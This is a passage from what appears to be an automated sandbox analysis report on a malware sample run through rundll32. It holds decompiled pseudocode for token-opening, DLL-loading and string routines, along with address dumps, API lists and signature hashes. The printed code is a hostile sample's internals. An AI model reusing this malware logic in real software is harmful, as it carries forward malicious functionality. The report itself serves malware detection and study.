						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0xee85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
						__eflags = _t235 - ( <=  ? _t258 : _t151);
						if(_t235 >= ( <=  ? _t258 : _t151)) {
							L49:
							__eflags = _t235 - _t258;
							_t154 =  >  ? _t258 : _t235;
							_a4 =  >  ? _t258 : _t235;
							__eflags = _t222 - 4;
							if(_t222 != 4) {
								L53:
								_t269 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t272;
								__eflags =  *(_t161 + 4);
								_t154 = _a4;
								if( *(_t161 + 4) != 0) {
									goto L53;
								} else {
									__eflags = _t154 - _t235;
									if(_t154 != _t235) {
										goto L53;
									} else {
										_t269 = _t222 - 3;
									}
								}
							}
							_t131 = _t272 + 0x38; // 0xf47d8bff
							_t132 = _t272 + 0x5c; // 0xee85000
							E04467180(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
							_t134 = _t272 + 0x5c;
							 *_t134 =  *(_t272 + 0x5c) + _a4;
							__eflags =  *_t134;
							E04465EE0( *_t134,  *_t272);
						} else {
							__eflags = _t235;
							if(_t235 != 0) {
								L46:
								__eflags = _t222;
								if(_t222 != 0) {
									_t162 =  *_t272;
									__eflags =  *(_t162 + 4);
									if( *(_t162 + 4) == 0) {
										__eflags = _t235 - _t258;
										if(_t235 <= _t258) {
											goto L49;
										}
									}
								}
							} else {
								__eflags = _t222 - 4;
								if(_t222 == 4) {
									goto L46;
								}
							}
						}
						asm("sbb edi, edi");
						_t271 =  ~_t269 & 0x00000002;
						__eflags = _t271;
						return _t271;
					} else {
						__eflags = _t218 - 4;
						if(_t218 == 4) {
							goto L34;
						} else {
							_t173 =  *_t272;
							__eflags =  *(_t173 + 4);
							if( *(_t173 + 4) != 0) {
								goto L34;
							} else {
								_t88 = _t272 + 0x5c; // 0xee85000
								__eflags = _t254 -  *_t88;
								if(_t254 !=  *_t88) {
									goto L34;
								} else {
									return 1;
								}
							}
						}
					}
				} else {
					return 3;
				}
			}






















































            0x04464166
            0x0446416b
            0x0446416f
            0x04464172
            0x04464172
            0x04464175
            0x0446417a
            0x0446417f
            0x04464182
            0x04464187
            0x0446418a
            0x04464190
            0x04464190
            0x0446419b
            0x0446419e
            0x044641a5
            0x044641aa
            0x00000000
            0x00000000
            0x044641b0
            0x044641b5
            0x044641b5
            0x044641ba
            0x044641c0
            0x044641ca
            0x044641cf
            0x044641d5
            0x044641f4
            0x044641f7
            0x04464202
            0x04464202
            0x04464202
            0x044641f9
            0x044641f9
            0x044641fb
            0x00000000
            0x044641fd
            0x044641fd
            0x044641fd
            0x044641fb
            0x0446420a
            0x0446420f
            0x04464214
            0x0446421a
            0x0446421e
            0x04464221
            0x04464224
            0x0446422a
            0x0446422f
            0x04464232
            0x04464238
            0x0446423d
            0x04464243
            0x04464249
            0x0446424e
            0x04464251
            0x04464256
            0x0446425a
            0x0446425e
            0x04464261
            0x04464264
            0x0446426d
            0x04464274
            0x04464277
            0x0446427a
            0x0446427f
            0x04464284
            0x04464287
            0x0446428a
            0x0446428a
            0x0446428e
            0x04464297
            0x0446429e
            0x044642a1
            0x044642a6
            0x044642ab
            0x044642ab
            0x044642ae
            0x044642b3
            0x00000000
            0x00000000
            0x044641d7
            0x044641d9
            0x044641e6
            0x00000000
            0x00000000
            0x044641e6
            0x044641d9
            0x00000000
            0x044641d5
            0x044642b9
            0x044642be
            0x044642c1
            0x044642c4
            0x0446436f
            0x0446436f
            0x044642ca
            0x044642ca
            0x044642ca
            0x044642cf
            0x044642f9
            0x044642fc
            0x044642fc
            0x04464301
            0x04464303
            0x04464305
            0x04464308
            0x0446430b
            0x04464313
            0x04464318
            0x04464318
            0x0446431e
            0x04464321
            0x04464324
            0x04464327
            0x04464329
            0x04464329
            0x0446432a
            0x0446432a
            0x04464327
            0x04464338
            0x0446433b
            0x0446433f
            0x04464344
            0x04464347
            0x0446434a
            0x0446434a
            0x0446434a
            0x0446434d
            0x0446434d
            0x04464350
            0x04464350
            0x044642d1
            0x044642d1
            0x044642e1
            0x044642e4
            0x044642e9
            0x044642e9
            0x044642ec
            0x044642ef
            0x044642f2
            0x044642f4
            0x044642f4
            0x04464353
            0x04464355
            0x04464358
            0x04464358
            0x0446435e
            0x04464362
            0x04464365
            0x04464367
            0x04464367
            0x04464378
            0x0446437a
            0x0446437a
            0x04464382
            0x04464390
            0x04464393
            0x04464395
            0x044643b5
            0x044643b5
            0x044643b8
            0x044643be
            0x044643bf
            0x044643c2
            0x044643c4
            0x044643c7
            0x044643ca
            0x044643cd
            0x044643d1
            0x044643d4
            0x044643d7
            0x044643da
            0x044643dc
            0x044643dc
            0x044643df
            0x044643e1
            0x044643e1
            0x044643e4
            0x044643e6
            0x044643e9
            0x044643f1
            0x044643f4
            0x044643f9
            0x044643f9
            0x044643ff
            0x04464402
            0x04464405
            0x04464407
            0x04464407
            0x04464408
            0x04464408
            0x04464413
            0x04464413
            0x04464413
            0x04464416
            0x04464419
            0x04464419
            0x0446441c
            0x0446441c
            0x044643df
            0x0446441f
            0x04464422
            0x04464425
            0x04464427
            0x0446442a
            0x0446442c
            0x0446442f
            0x04464432
            0x04464434
            0x04464437
            0x0446443f
            0x04464447
            0x0446444a
            0x0446444a
            0x0446444a
            0x0446444d
            0x0446444d
            0x0446444d
            0x04464450
            0x04464456
            0x04464458
            0x04464458
            0x0446445e
            0x04464464
            0x0446446d
            0x04464474
            0x04464476
            0x04464479
            0x04464479
            0x0446447c
            0x0446447c
            0x0446447f
            0x04464481
            0x04464484
            0x04464486
            0x044644a1
            0x044644a1
            0x044644a5
            0x044644a8
            0x044644ab
            0x044644ae
            0x044644c4
            0x044644c4
            0x044644c4
            0x044644b0
            0x044644b0
            0x044644b2
            0x044644b6
            0x044644b9
            0x00000000
            0x044644bb
            0x044644bb
            0x044644bd
            0x00000000
            0x044644bf
            0x044644bf
            0x044644bf
            0x044644bd
            0x044644b9
            0x044644c8
            0x044644cb
            0x044644d0
            0x044644da
            0x044644da
            0x044644da
            0x044644dd
            0x04464488
            0x04464488
            0x0446448a
            0x04464491
            0x04464491
            0x04464493
            0x04464495
            0x04464497
            0x0446449b
            0x0446449d
            0x0446449f
            0x00000000
            0x00000000
            0x0446449f
            0x0446449b
            0x0446448c
            0x0446448c
            0x0446448f
            0x00000000
            0x00000000
            0x0446448f
            0x0446448a
            0x044644e7
            0x044644e9
            0x044644e9
            0x044644f4
            0x04464397
            0x04464397
            0x0446439a
            0x00000000
            0x0446439c
            0x0446439c
            0x0446439e
            0x044643a2
            0x00000000
            0x044643a4
            0x044643a4
            0x044643a4
            0x044643a7
            0x00000000
            0x044643ab
            0x044643b4
            0x044643b4
            0x044643a7
            0x044643a2
            0x0446439a
            0x04464386
            0x0446438f
            0x0446438f

            APIs
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: memcpy
            • String ID:
            • API String ID: 3510742995-0
            • Opcode ID: 03b0abeb86da1b833a58bdc3ae0fa7b72a6af37fe1020f7e2813aec2e01359af
            • Instruction ID: c258453cb33296875341aecad9ea9a2cb40563468fbecd199e2f466032c2028b
            • Opcode Fuzzy Hash: 03b0abeb86da1b833a58bdc3ae0fa7b72a6af37fe1020f7e2813aec2e01359af
            • Instruction Fuzzy Hash: 83D112756006009FDF24CF6DC9C596AB7E1AF88348B24892EE88AC7705D731F9458B5A
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0445C92F Relevance: 6.0, APIs: 4, Instructions: 33threadCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E0445C92F(void* __ecx) {
				void* _v8;
				void* _t10;
				intOrPtr _t13;

				if(OpenThreadToken(GetCurrentThread(), 8, 0,  &_v8) != 0) {
					L4:
					_t10 = _v8;
				} else {
					if(GetLastError() != 0x3f0) {
						L3:
						_t10 = 0;
					} else {
						_t13 =  *0x446f8d0; // 0x450f8c0
						if(OpenProcessToken( *((intOrPtr*)(_t13 + 0x12c))(), 8,  &_v8) != 0) {
							goto L4;
						} else {
							goto L3;
						}
					}
				}
				return _t10;
			}






            0x0445c94e
            0x0445c980
            0x0445c980
            0x0445c950
            0x0445c95b
            0x0445c97c
            0x0445c97c
            0x0445c95d
            0x0445c967
            0x0445c97a
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x0445c97a
            0x0445c95b
            0x0445c985

            APIs
            • GetCurrentThread.KERNEL32 ref: 0445C942
            • OpenThreadToken.ADVAPI32(00000000,?,?,0445CA74,00000000,04450000), ref: 0445C949
            • GetLastError.KERNEL32(?,?,0445CA74,00000000,04450000), ref: 0445C950
            • OpenProcessToken.ADVAPI32(00000000,?,?,0445CA74,00000000,04450000), ref: 0445C975
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: OpenThreadToken$CurrentErrorLastProcess
            • String ID:
            • API String ID: 1515895013-0
            • Opcode ID: 6c462484898afd8cfe3cce78c8ae242791a11853f0a818f8d52f86780fe0d144
            • Instruction ID: 6304ae483b5fcc8a147be627e2feae48f0f118a0ff30bd294962cb2a45e2af1e
            • Opcode Fuzzy Hash: 6c462484898afd8cfe3cce78c8ae242791a11853f0a818f8d52f86780fe0d144
            • Instruction Fuzzy Hash: 5FF03A72A00605EBEF109FB4D849FAA73ECFB08600F001492EA46D3161E774FD048B61
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0445D309 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117libraryCOMMON
            Download Yara Rule
            C-Code - Quality: 89%
            			E0445D309(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v140;
				signed char _t14;
				char _t15;
				intOrPtr _t20;
				void* _t25;
				intOrPtr _t26;
				intOrPtr _t32;
				WCHAR* _t34;
				intOrPtr _t35;
				struct HINSTANCE__* _t37;
				intOrPtr _t38;
				intOrPtr _t46;
				void* _t47;
				intOrPtr _t50;
				void* _t60;
				void* _t61;
				char _t62;
				void* _t65;
				intOrPtr _t66;
				char _t68;

				_t65 = __esi;
				_t61 = __edi;
				_t47 = __ebx;
				_t50 =  *0x446f8d4; // 0x450fc00
				_t1 = _t50 + 0x1898; // 0x0
				_t14 =  *_t1;
				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
					_t15 = E04459F85(_t50, 0xb9d);
					_t66 =  *0x446f8d4; // 0x450fc00
					_t62 = _t15;
					_t67 = _t66 + 0xb0;
					_v8 = _t62;
					E04459FE4( &_v140, 0x40, L"%08x", E0445E34A(_t66 + 0xb0, E0445A5D0(_t66 + 0xb0), 0));
					_t20 =  *0x446f8d4; // 0x450fc00
					_t7 = _t20 + 0xa8; // 0x1
					asm("sbb eax, eax");
					_t25 = E04459F85(_t67, ( ~( *_t7) & 0xfffffeb6) + 0xded);
					_t26 =  *0x446f8d4; // 0x450fc00
					_t68 = E04459C50(_t26 + 0x1020);
					_v12 = _t68;
					E04458D9A( &_v8);
					_t32 =  *0x446f8d4; // 0x450fc00
					_t34 = E04459C50(_t32 + 0x122a);
					 *0x446f9d4 = _t34;
					_t35 =  *0x446f8d0; // 0x450f8c0
					 *((intOrPtr*)(_t35 + 0x11c))(_t68, _t34, 0, 0x446c9d8,  &_v140, ".", L"dll", 0, 0x446c9d8, _t25, 0x446c9d8, _t62, 0, _t61, _t65, _t47);
					_t37 = LoadLibraryW( *0x446f9d4);
					 *0x446f9cc = _t37;
					if(_t37 == 0) {
						_t38 = 0;
					} else {
						_push(_t37);
						_t60 = 0x28;
						_t38 = E0445F08E(0x446cbc4, _t60);
					}
					 *0x446f9d0 = _t38;
					E04458DDF( &_v12, 0xfffffffe);
					E04458F63( &_v140, 0, 0x80);
					if( *0x446f9d0 != 0) {
						goto L10;
					} else {
						E04458DDF(0x446f9d4, 0xfffffffe);
						goto L8;
					}
				} else {
					L8:
					if( *0x446f9d0 == 0) {
						_t46 =  *0x446f908; // 0x450fa00
						 *0x446f9d0 = _t46;
					}
					L10:
					return 1;
				}
			}

























            0x0445d309
            0x0445d309
            0x0445d309
            0x0445d30c
            0x0445d318
            0x0445d318
            0x0445d323
            0x0445d33f
            0x0445d344
            0x0445d34d
            0x0445d34f
            0x0445d357
            0x0445d378
            0x0445d37d
            0x0445d382
            0x0445d38a
            0x0445d397
            0x0445d3a5
            0x0445d3b6
            0x0445d3bc
            0x0445d3bf
            0x0445d3d6
            0x0445d3e2
            0x0445d3ea
            0x0445d3f1
            0x0445d3f7
            0x0445d403
            0x0445d409
            0x0445d410
            0x0445d423
            0x0445d412
            0x0445d412
            0x0445d415
            0x0445d41b
            0x0445d420
            0x0445d425
            0x0445d430
            0x0445d442
            0x0445d454
            0x00000000
            0x0445d456
            0x0445d45d
            0x00000000
            0x0445d463
            0x0445d464
            0x0445d464
            0x0445d46b
            0x0445d46d
            0x0445d472
            0x0445d472
            0x0445d477
            0x0445d47b
            0x0445d47b

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: LibraryLoad
            • String ID: %08x$dll
            • API String ID: 1029625771-2963171978
            • Opcode ID: 7b35645f2ecc05e6d49bcd383f8847a14897891319b26da54300dcd5c9ef377e
            • Instruction ID: a46a3172720312265ddf4eaba7a3b3e57bdea603ee55b3acbc2e01c7deb4b925
            • Opcode Fuzzy Hash: 7b35645f2ecc05e6d49bcd383f8847a14897891319b26da54300dcd5c9ef377e
            • Instruction Fuzzy Hash: 423175B2A00604FBFF10AB69EC45F5A32ECEB45618F14416BF949D7192DF38BD488B52
            Uniqueness

            Uniqueness Score: -1.00%

            Function 044636D5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55stringCOMMON
            Download Yara Rule
            C-Code - Quality: 47%
            			E044636D5(void* __eflags, long long __fp0, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				char _v5;
				long long _v12;
				short _v20;
				signed int _t15;
				void* _t16;
				signed int _t22;
				char _t25;
				void* _t26;
				signed int _t28;
				intOrPtr _t29;
				void* _t31;
				char** _t32;
				long long _t40;
				long long _t41;

				_t40 = __fp0;
				_t15 = E044635EE(_a4);
				 *_t32 = "msxml32.dll";
				_t28 = _t15 & 0x0fffffff;
				_t16 = E0445A5D0();
				_t26 = 0xf;
				_t25 = 0;
				_v5 = 0;
				if(_t16 > _t26) {
					L2:
					_t3 = _t25 + 0x41; // 0x41
					 *((char*)(_t31 + _t25 - 0x10)) = _t3;
					_t25 = _t25 + 1;
				} else {
					_t26 = _t16;
					if(_t26 != 0) {
						do {
							goto L2;
						} while (_t25 < _t26);
					}
				}
				lstrlenW( &_v20);
				_t29 = _a8;
				_t22 = _a12 - _t29 + 1;
				_a12 = _t22;
				asm("fild dword [ebp+0x10]");
				if(_t22 < 0) {
					_t40 = _t40 +  *0x446cf90;
				}
				_a12 = _t28;
				_v12 = _t40;
				_t41 = _v12;
				asm("fild dword [ebp+0x10]");
				if(_t28 < 0) {
					_t41 = _t41 +  *0x446cf90;
				}
				_v12 = _t41;
				asm("fmulp st1, st0");
				L04468995();
				return _t29 - _t22;
			}

















            0x044636d5
            0x044636e0
            0x044636e7
            0x044636ee
            0x044636f4
            0x044636fc
            0x044636fd
            0x044636ff
            0x04463704
            0x0446370c
            0x0446370c
            0x0446370f
            0x04463713
            0x04463706
            0x04463706
            0x0446370a
            0x0446370c
            0x00000000
            0x00000000
            0x0446370c
            0x0446370a
            0x0446371c
            0x04463725
            0x0446372a
            0x0446372d
            0x04463730
            0x04463733
            0x04463735
            0x04463735
            0x0446373b
            0x0446373e
            0x04463741
            0x04463744
            0x04463749
            0x0446374b
            0x0446374b
            0x04463751
            0x0446375d
            0x0446375f
            0x0446376b

            APIs
            • lstrlenW.KERNEL32(?,000000B0,000000B0,?,00000000,000000B0,00000228), ref: 0446371C
            • _ftol2_sse.MSVCRT ref: 0446375F
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: _ftol2_sselstrlen
            • String ID: msxml32.dll
            • API String ID: 1292649733-2051705522
            • Opcode ID: 18dbaf781ce2a09ca94abcd8221a6e6974386771e8ac56f3d0f6b5304ce5358c
            • Instruction ID: 702a88be912072da4474c0aad0bd2f8935f2e8e6b438e85ef66a42407c6aff8a
            • Opcode Fuzzy Hash: 18dbaf781ce2a09ca94abcd8221a6e6974386771e8ac56f3d0f6b5304ce5358c
            • Instruction Fuzzy Hash: 9D1108B2A00289EBDF009F69E8044DE7FB5FF84314F26866ADC5696246EB70E5648342
            Uniqueness

            Uniqueness Score: -1.00%